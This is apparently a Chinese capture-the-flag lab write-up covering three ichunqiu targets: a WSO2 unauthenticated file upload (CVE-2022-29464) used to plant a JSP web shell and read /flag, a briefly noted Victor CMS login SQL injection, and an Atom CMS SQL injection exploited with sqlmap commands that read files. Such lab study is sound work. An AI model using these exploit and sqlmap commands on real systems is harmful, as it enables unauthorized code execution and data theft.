春秋云境刷题1
CVE-2022-29464
靶标介绍:
WSO2文件上传漏洞(CVE-2022-29464)是Orange Tsai发现的WSO2上的严重漏洞。该漏洞是一种未经身份验证的无限制任意文件上传,允许未经身份验证的攻击者通过上传恶意JSP文件在WSO2服务器上获得RCE。
Github下载EXP,地址:https://github.com/hakivvi/CVE-2022-29464/
执行命令:python exploit.py http://123.58.236.76:38380/ abc.jsp或者在pycharm上运行
根据返回信息可判断abc.jsp已成功上传。
浏览器直接访问返回路径,即可执行任意系统命令。
shell @ http://eci-2zefnfvpsa7cleo0wubm.cloudeci1.ichunqiu.com:9445//authenticationendpoint/abc.jsp
ls
cat /flag
CVE-2022-28060
靶标介绍:
Victor CMS v1.0 /includes/login.php 存在sql注入
在登录点抓包
将数据包 粘贴到1.txt
CVE-2022-25488
靶标介绍:
Atom CMS v2.0存在sql注入漏洞在/admin/ajax/avatar.php页面
进入之后发现是Not Found页面
访问/admin/ajax/avatar.php,发现是空白页面
查看源码
删除 avatar.php 文件发现能看到整个目录
查看其他文件得到报错信息
测试一下注入点?id=1
源码发生了变化:
?id=1'
是字符型注入
使用 SQLMap
python sqlmap.py -u "http://eci-2zehclipdg0vl24ixud6.cloudeci1.ichunqiu.com/admin/ajax/avatar.php?id=1"
python sqlmap.py -u "http://eci-2zehclipdg0vl24ixud6.cloudeci1.ichunqiu.com/admin/ajax/avatar.php?id=1" -D "mysql" --file-read "/flag"
